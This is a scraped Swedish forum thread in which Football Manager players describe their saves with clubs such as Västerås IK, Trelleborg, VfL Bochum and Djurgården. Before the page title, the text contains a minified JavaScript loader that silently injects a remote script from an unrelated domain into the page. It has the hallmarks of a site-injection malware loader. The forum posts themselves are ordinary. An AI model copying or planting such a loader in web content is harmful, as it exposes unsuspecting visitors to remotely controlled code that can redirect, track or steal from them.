;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vilket lag är du? Hur går det? – Äldre utgåvor – FMSweden Forum
Meny Stäng

Vilket lag är du? H...
 
Share:
Notifications
Clear all

Vilket lag är du? Hur går det?

140 Inlägg
61 Users
308 Reactions
13.9 K Visningar
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
Topic starter  

Det är väl lika bra att dra igång denna klassiska tråd. Denna tråd är till för oss som inte orkar göra en rapport men ändå vill skriva här i forumet om hur det går för oss på våra sparningar.

Jag kan börja berätta om min sparning. Jag började med att ladda ner alla Europeiska ligor härifrån: https://www.fmscout.com/a-fm20-leagues-pack-by-timo.html Sedan när jag startade spelet valde jag att ladda alla divisioner från Nordiska ligor men även alla högstaligor från Europa plus stor databas. Detta gjorde att jag fick nästan 200 000 spelare i databasen från start. Eftersom Division 3 var lägsta spelbara divisionen i Sverige med denna databas så tog jag över det Division 3-laget som låg närmast där jag växte upp i Västerås och startade min resa där utan utbildningar och utan erfarenhet. Målet med sparningen är att vinna ligan i samtliga Nordiska länder.

 

 

Säsong 1 - 2019 - Västerås IK - Division 3

 

 

Vi var tippade näst sist och trots det valde jag att inte göra några nyförvärv. Skapar en 4-4-2 taktik med lite Nordisk touch där vi har bollvinnande mittfältare + löpstark mittfältare på innermittfältet och sedan en bollmottagare och en pressande forward i anfallet. Hög press gillar jag (och spelet) så det kör vi med och annars är det inte så stora konstigheter gällande taktiken, önskas den i ett senare skede kan jag kasta upp den.

Debutsäsongen blir en stor succé, laget slutar på 3e plats och jag lyckas erhålla både nationell c-licens och nationell b-licens. Bästa spelaren i laget var helt klart innermittfältaren Samed Karaman (newgen) som snittade 7,25 på 17 matcher. Den bästa riktiga spelaren var kaptenen Gabriel Medina i mittförsvaret som snittade 6,84. Tyvärr har jag ingen tabell att visa upp då jag är några år in i spelet men jag kan hinta om att VIKs succéår inte gått obemärkt förbi...

 


   
JOSSTICK and The Gustine reacted
Citera
Q
 Q
(@q)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 134
 

TRELLEBORGS FF
2020: 
Superettan 2. 16-6-8 +18 54p
Svenska Cupen: Gruppspel
2021: 
Allsvenskan 14. 6-10-14 -20 28p (Kvalade oss kvar mot Östersunds FK)
Svenska Cupen: Kvartsfinal
2022: 
Allsvenskan 7. 14-6-10 +14 48p
Svenska Cupen: Andra omgången
2023: 
Allsvenskan 9. 10-8-12 -9 38p
Svenska Cupen: Kvartsfinal
2024: 
Allsvenskan 10. 11-8-11 -1 41p
Svenska Cupen: Semifinal
2025: 
Allsvenskan 2. 18-7-5 +18 61p
Svenska Cupen: Final

TRUPP
Mål: Tomás Cascallar (kom inför 2026) och Hampus Nilsson (från start).
Försvarare: Mikhail Komlichenko (kom inför 2026), Niklas Vesterlund (från start), Kasper Harletun (från start), Isak Jönsson (från start), Anton Tideman (från start), Totte Holmkvist (från start) och Ìlyas Aksoy (Egen produkt).
Mittfältare: Herman Hallberg (från start), Mouhammed-Ali Dhaini (från start), Kevin Yakob (kom inför 2022), Mustafe Ismail (kom inför 2021), Aleksander Nilsson (Lån från MFF för tredje säsongen), Gylfi Sigurdsson (kom inför 2026), Adi Nalic (kom inför 2023), Daniel Cedillo (kom under 2025) och Boubacar Hanne (kom under 2023).
Anfallare: Fatawu Safiu (från start) och Michael Folivi (kom inför 2021).

NOTERBARA FÖRSÄLJNINGAR
2024:
André Lundgren (egen produkt) till Djurgårdens IF, 10 miljoner.
2025: Marcus Liverstam (egen produkt) till Watford, 30 miljoner. Samul Adrian (kom gratis inför 2021) till Trapani, 16 miljoner.

VI HAR ALLTID DRÖMT OM ATT SPELA I BLÅRANDIGT - SPELA SOM I VÅRA DRÖMMAR!


   
Andreas_N and trashbag reacted
SvaraCitera
Andreas_N
(@andreas_n)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 38
 

Inne på andra säsongen med Deportivo La Coruna (lyckas inte med spanska N på telefonen...).

Kör FM Touch på iPad, vilket innebär mindre databas osv, men utmaningen är densamma ?

Ålderstigen trupp med mkt lån och ekonomin är kass. Första säsongen kom vi till play off. Vann 1:a omg men torskade den andra avgörande...åkte på baklängesmål i 85’ så Sporting Gijon gick vidare på seedning (bortamålsregeln gäller ej).

Nu säsong två har vi spelat 25 omg. Tight mellan mig, Alavés och Girona i toppen. Vi har typ samma poäng, skiljer 1-4p hit eller dit.

Real och Barcas reservlag skuggar, och ca 10p ner till övriga lag på playoff-plats. så kampen om direkt uppflyttning kommer att bli tuff!

Har med små medel lyckats få en bättre och yngre trupp i år. Stora investeringen blev anfallaren Carlos Hernandez från Sevilla (tidigare utlånad till Deportivo och har oss som favoritklubb, ett plus).

justerade ett par delar i min 3-4-3 ”Kontrollera” (med wingbacks och yttrar) till i år, så defensiven sitter mkt bättre ?


   
trashbag reacted
SvaraCitera
Hellsten
(@hellsten)
Active Member
Blev medlem: 4 år sedan
Inlägg: 14
 

Ganska nyligen börjat med FM20 efter en magisk save på 19 med Real Zaragoza där jag till slut lyckades vinna CL. Testade några olika saves på FM20 först men fastnade inte för någon, men nu jäklar.

Kör med IK Arvika och började alltså i div 4 Värmland (tack jesus för helsvenskan, alltid grymt kul). Gått raka vägen igenom seriesystemet i några år nu och gick precis upp i division 1 norra. Fyran och trean var rätt enkla bara med de spelare jag plockade på free direkt vid start, men eftersom ekonomin är som den är (skit och ingenting) så kunde jag ju inte plocka in några nya direkt till tvåan. Började sjukt kasst i tvåan men otroligt nog lyckades jag vinna serien till slut med minsta möjliga marginal då jag hittade formen mot slutet och alla andra lag i toppen tappade den. Så nu är det full panik då truppen är alldeles för usel för division 1 och jag har spenderat hela min typ obefintliga lönebudget (nästan alla spelare är på amatörkontrakt fortfarande...) på 2 mittbackar och en målis. 


   
raca14 and trashbag reacted
SvaraCitera
Hellsten
(@hellsten)
Active Member
Blev medlem: 4 år sedan
Inlägg: 14
 

Ska lägga till att största anledningen till att jag löste uppflyttning nu senast var anfallaren med KLASSNAMNET Gino Berg som jag fick in efter halva säsongen. Jävla hjälte. 


   
SvaraCitera
Petter
(@petter)
New Member
Blev medlem: 4 år sedan
Inlägg: 4
 

Snart spelat tredje säsongen med Sunderland.

Första året blev det en andraplats och uppflyttning från League One.

Andra året missade jag playoff-platsen på målskillnad.

Tredje säsongen är snart färdigspelad och vi går mot en tolfte plats i championship.

Värvar ungt och bygger laget långsiktigt för att ha stabil ekonomi innan jag tar steget upp, nuvarande säsong är ett kraftigt steg bakåt så flera spelare ryker i sommarfönstret medans värdet finns kvar.


   
trashbag reacted
SvaraCitera
Niklas7
(@niklas7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 68
 

VFL Bochum 1848

 

SÄSONG 1: 2.Bundesliga 34 matcher, 28 vinster, 1 oavgjord, 5 förluster, +41 målskillnad, 85 poäng

Vi testade oss på en save i 2.Bundesliga och lagvalet föll på Bochum, ett lag som kändes ganska trevliga att lira med, inget utstickande lag direkt men som jag såg som en liten utmaning. Vi satte en offensiv taktik som verkligen satte sig klockrent och ligan vanns tämligen enkelt, 13 poäng före tvåan Hannover 96 med Guidetti som bästa spelare den säsongen. Ganvoula, vårat förstaval i anfallet hade en riktigt bra säsong, 20 mål talar sitt egna språk, yttrarna Weilandt och Blum var inte allt för dåliga de heller, 11 respektive 12 mål från de båda. Mittbackstalangen Bella-Kotchap styrde och ställde där bak dirigenten Janelt briljerade på mittfältet, vi hade en bra säsong kan vi kort sammanfatta det. 

Två spelare anslöt och det handlade om två lån i form av River Plates Thomas Gutierrez och Mainz Erkan Eyibil. Ingen lyckades sticka ut speciellt men fanns ändå med som bänk-alternativ. Spelarförsäljningar gjordes också, Sydkoreanen Lee Chung-Yong hade svårt med speltid och drog till Astana för en mindre summa. Desto mer fick vi för Milos Pantovic som Southampton ganska överraskande var intresserade av, en spelare som startade hos men som inte alls lyckades spela en bra fotboll. Lätta 18 miljoner att nöja sig med, såhär i framtiden så kan jag berätta att hans tid i Saints inte var vidare lyckad och finns numer att skåda i MLS.

Inför nästa säsong lär vi gå igenom marknaden lite, leta spelare i mängder och försöka fynda allt vi bara kan. Taktiken är tänkt att vara den samma, men klarar vi inte av att hålla nivå så kan det bli så att vi får ändra om lite i taktiken och köra en aning försiktigare, men inte allt för fegt, det är inte våran stil. Mer om säsong 2 kommer senare!


   
Andreas_N, trashbag and hajen reacted
SvaraCitera
(@ocarne)
Active Member
Blev medlem: 4 år sedan
Inlägg: 11
 

Började i brescia och försökte på mig en club and country där man endast får köpa och använda italienska spelare. Fick dojan och sedan tog jag över klubben som Buffon ägde och där är jag nu


   
SvaraCitera
Pontus Wernbloom
(@pontus-wernbloom)
Eminent Member Admin
Blev medlem: 4 år sedan
Inlägg: 32
 

Är på en andra sejour i Derry City samt förbundskapten för Irland. Har redan sagt upp mig hos Derry men först efter säsongen, en omöjlig kärlek tyvärr.

Hur det går? Åt helvete!

PW


   
SvaraCitera
Ospeon
(@ospeon)
New Member
Blev medlem: 4 år sedan
Inlägg: 1
 

Metalac (2027)

Började i serbiska andraligan och nu åtta år senare har jag precis norpat åt mig fjärde raka ligatiteln. Den riktiga utmaningen nu är CL, där har det tagit stopp i åttondelen två år i rad nu. Registreringsreglerna på max fyra icke-serber i truppen är ett ständigt irritationsmoment...

Bjuder nedan på FINA David som vi värvade för ofattbara 600k. Man älskar ju brasilianska utköpsklausuler.


   
trashbag and Yayakolo reacted
SvaraCitera
Niklas7
(@niklas7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 68
 

VFL Bochum 1848

 

SÄSONG 2: Bundesliga 34 matcher, 14 vinster, 8 oavgjord, 12 förluster, +6 målskillnad, 50 poäng

Säsong två i Bochum och vi börjar känna oss bekväma med varandra! Vi fortsätter med den offensiva taktiken vi bestämt oss för, tror den kan överraska en hel del lag, man ska inte komma och underskatta oss direkt, då jävlar blir det åka av. Hur gick då säsongen? Jo men helt okej får jag ändå säga, vi var naturligtvis tippade att sluta allra sist i tabellen men de sket väl vi i. Vi slutar på en trygg och trevlig 9:e plats i Bundesliga, väl godkänt! Det var långt ifrån alla som gjorde bra ifrån sig, men de som verkligen gjorde sig ett namn var våran defensiv samt Ganvoula som verkligen inte brydde sig nämnvärt över vilka backar han ställdes emot. 27 mål denna säsong för den skickliga anfallaren. Även Weilandt gjorde sina mål, 10 st till vår förtjusning. Firma Bella-Kotchap/Decarli gjorde precis vad de skulle defensivt och centrallåset på mittfältet i form av Janelt och Lundstram var en lyckad hit! Kort kan man säga att det ser bra ut men det finns en del att förbättra, en aning säkrare ekonomi nu gör det heller inte sämre.

Fyra spelare in gjordes säsong två, två free transfers, ett lån och en tysk talang värvad för skitsumman av 440t kr. John Lundstram, tidigare Sheffield U och Viktor Johansson, tidigare Leicester ansluter gratis, en mer lyckad än den andra som ni nog kan förstå. Högerbacken Emir Terzi lånades in från Dortmund och var helt okej, startspelare under säsongen och 7 assister på sitt konto när vi sedan summerar säsongen. Tyska talangen plockades från Ulm, Felix Beckers heter han och det är en spelare för framtiden! Även denna säsong säljer vi spelare för mer än vad vi handlar för, nu säljer vi för 14 milj. Inte vidare mycket men pengar är ändå pengar hur man än vrider och vänder på det. Egentligen är de bara en spelare av värde som försvann, anfallaren Simon Zoller hade inget hos oss att göra och såldes till Kiel för just 14 milj. 7 mål på två säsonger stod han i framtiden för där, helt klart värda pengar att få in.

Säsong två var lyckad och nu väntar alltså "andraåret" i Bundesliga, de så svåra året man brukar tjata om. Vi kommer ha allt mer pengar att röra oss med och likt denna säsong lär det fortsättas med samma lyckade taktik. Ska dock sägas att jag inte tvekar på att ändra något ifall de ska behövas. Framtiden ser ljus ut, frågan är vart detta leder till. Kan bli svårt att förbättra vår position som vi tog iår.


   
trashbag and Andreas_N reacted
SvaraCitera
Armada
(@armada)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 68
 

Lyckades ta mig från sjätte divisionen i England till Championship på sex säsonger med Guiseley Association FC. 

Tyckte dock bara att det blev tråkigt när jag inte fick några bud på mina spelare så jag kunde sälja dom för att sedan kunna värva in nya spelare, utan fick köra med samma trupp + gratis spelare hela tiden. Så jag bytte klubb till AS Saint Etienne i League 1. Det gick dock inget vidare så provade på lite olika klubbar men hittade aldrig riktigt hem.

"Oi bruv, three pints a lagar and a pint a guiness." - Bret Clement's greeting to pretty much everyone.


   
SvaraCitera
Prev
 Prev
(@prev)
Active Member
Blev medlem: 4 år sedan
Inlägg: 18
 
Postad av: @armada

Lyckades ta mig från sjätte divisionen i England till Championship på sex säsonger med Guiseley Association FC. 

Tyckte dock bara att det blev tråkigt när jag inte fick några bud på mina spelare så jag kunde sälja dom för att sedan kunna värva in nya spelare, utan fick köra med samma trupp + gratis spelare hela tiden. Så jag bytte klubb till AS Saint Etienne i League 1. Det gick dock inget vidare så provade på lite olika klubbar men hittade aldrig riktigt hem.

Imponerande!


   
Armada reacted
SvaraCitera
Bulbabae
(@bulbabae)
Active Member
Blev medlem: 4 år sedan
Inlägg: 9
 

Lirar med min DIF-sparning från FM18, är i år 2035 och har vunnit följande titlar: 

  • Vunnit Allsvenskan varje år förutom 2018 (började 2017)
  • Vunnit Svenska Cupen varje år förutom 2020/21 och 2024/25
  • Vunnit Champions League två gånger, 2029 och 2031, och nått finalen totalt fyra gånger; 2028, 2029, 2031 och 2034.
  • Vunnit Europa League en gång, 2027.
  • Vunnit Klubb-VM två gånger, 2029 och 2031.
  • Vunnit Europeiska Supercupen två gånger, 2027 och 2031.

Utöver det så har jag:

  • Byggt en arena döpt efter mig med kapacitet för 58 000 åskådare.
  • Världens näst högst rankade lag i rykte.
  • Fyra i världen på UEFA coefficienter.
  • Fått Sverige till åttonde plats i UEFA coefficienter, får därmed en garanterad plats i Champions League gruppspelet varje år.
  • Gått obesegrad i Allsvenskan två gånger (2025 och 2028) varav en gång (2025) 30 matcher vunna, inga förluster och inga oavgjorda.
  • Gjort 119 mål i en Allsvensk säsong, 2031.
  • Släppt in endast 13 mål på en hel Allsvensk säsong två gånger, 2025 och 2029.

 


   
Klinsi and trashbag reacted
SvaraCitera
Asdacus
(@antonb01)
Active Member
Blev medlem: 4 år sedan
Inlägg: 8
 

Spelar med det laget jag själv spelar i: Vissefjärda GIF som idag spelar i Div 6 Växjö, har precis avslutat min 2a säsong där jag vann Div 5 södra och ska nu börja div 4 sydvästra Småland som är den högsta nivån Vissefjärda har spelat i men jag har lite svårt att locka till mig spelare på grund av att jag är i en sån låg division.


   
trashbag reacted
SvaraCitera
Armada
(@armada)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 68
 

@bulbabae

Grymt! Du tycker inte att det blir svårt att motivera sig då man vinner hela tiden? 

"Oi bruv, three pints a lagar and a pint a guiness." - Bret Clement's greeting to pretty much everyone.


   
SvaraCitera
Gabriel-J
(@gabriel-j)
Active Member
Blev medlem: 4 år sedan
Inlägg: 12
 

Spelar med Favoriterna IFK Göteborg, inne i säsong 2028. 
Återberättar om resan till att bli Europadominant i en rapport på forumet.
Hittills vunnit CL, VM för klubblag, Allsvenskan, Svenska Cupen.
är just nu inne i Semifinal i Europa League, siktar på att ta hem EL.  


   
Bulbabae reacted
SvaraCitera
Bulbabae
(@bulbabae)
Active Member
Blev medlem: 4 år sedan
Inlägg: 9
 

@armada Jo det är klart, började igen med sparningen nu denna vecka och senast spelade jag med den när FM19 släpptes. Blev sugen nu igen och är rätt roligt. 

Har många egna talanger och väldigt lojala spelare vilket gör spelet roligare!


   
SvaraCitera
Diego Pablo Simeone
(@diego-pablo-simeone)
New Member
Blev medlem: 4 år sedan
Inlägg: 1
 

Har haft en tung svacka senaste månaderna men med nysatsande FM Sweden så måste man som hederlig medborgare naturligtvis dra sitt strå till stacken.

Har försökt med flertalet klubbar under sommaren men inte hittat rätt med någonting. Ger mig nu på ett sista försök på årets upplaga och tar över Sevilla med Francisco Rodríguez Cacho, som tar över klubbens nysatsning direkt från reservlaget där han skördat stora framgångar sin unga ålder till trots.

¡Vamos!

This post was modified 4 år sedan by Diego Pablo Simeone

   
trashbag reacted
SvaraCitera
Niklas7
(@niklas7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 68
 

VFL Bochum 1848

 

SÄSONG 3: Bundesliga 34 matcher, 16 vinster, 9 oavgjord, 9 förluster, +24 målskillnad, 57 poäng

Vi börjar bli varma i kläderna, Bochum och jag. Min fråga förra året var ifall vi skulle lyckas bättra oss från förra säsongen då vi tog en väldigt bra placering i den övre halvan och nu när vi hade spelat klart denna säsong visade det sig att visst, vi skulle göra det ännu bättre. 8:e plats denna säsong och bara en placering bakom en form av Europaplats som istället gick till 7:e placerade Dortmund. Årets stora överraskning blev FC Köln som sjukt nog gick och tog hem ligan, en poäng före Bayern Munchen. Markus Gisdol har verkligen gjort underverk för Köln. En annan som gör underverk är vår anfallare Ganvoula som för tredje året irad gör fler än 20 mål, denna säsong blev de 22 stycken. En annan som var riktigt bra var Dzenis Burnic som vi lyckades plocka på free, han blev utsedd som ligans bästa spelare, både från spelarna och medierna, han hade även en plats i årets Bundesliga-elva. I slutet av säsongen valde jag att ändra taktiken något, den började bli läst av motståndet på andra delen av säsongen och vi behövde göra något.

Nu var det dags att bruka allvar, det skulle spenderas pengar, vi var liksom lite tvungna att förstärka oss. Vi värvade spelare för 147 milj, där 50 milj var det dyraste vi spenderade på en spelare. Vi fann en ny förstakeeper när vi återigen hälsade på River Plate, Matias Arce var hans namn och han tog ansvaret direkt mellan stolparna. Hidde ter Avest togs in som startande högerback och Aaron Hickey togs även han in som ytterback på utveckling, det som är så bra med honom var att han kan spela på båda kanterna. José Carlos Lazo fyndades i Getafe för 13 milj. Burnic anslöt som vi tidigare nämnt som klubblös, det gjorde även mittbacken Tosin Adarabioyo som senast spelat för Manchester City. Annars togs ett par spelare in mest som reserver eller något för framtiden. Harvey Elliot från Liverpool anslöt under vintern men enbart på lån, ett lån vi kan se tillbaka på som ett lyckat sådant. 3+3 på 13 matcher från ytterkant ska det inte klagas över. Ut däremot hände inte allt för stora saker, ett gäng med spelare lämnade på lån. Annars var det mest dökött som lämnade klubben, spelare som klagade eller som inte ens var nära en startelva. Förstakeepern från säsong ett och två lämnade för Heidenheim, mittbacken Decarli for till Belgien och Oostende. Totalt säljer vi spelare för 9.25 milj, ganska lite men så kan de bli när man bara säljer spelare av litet värde.

Det ska bli spännande att få se hur laget kommer agera under en hel säsong med den nya taktiken som vi satte i slutskedet av säsongen. Med lite nytt blod i truppen och lite försäljningar här och där så kanske vi kan överraska ännu en säsong, vi har aldrig varit sämre än övre halvan, det är trevligt att se!


   
trashbag reacted
SvaraCitera
Sida 1 / 7
Share: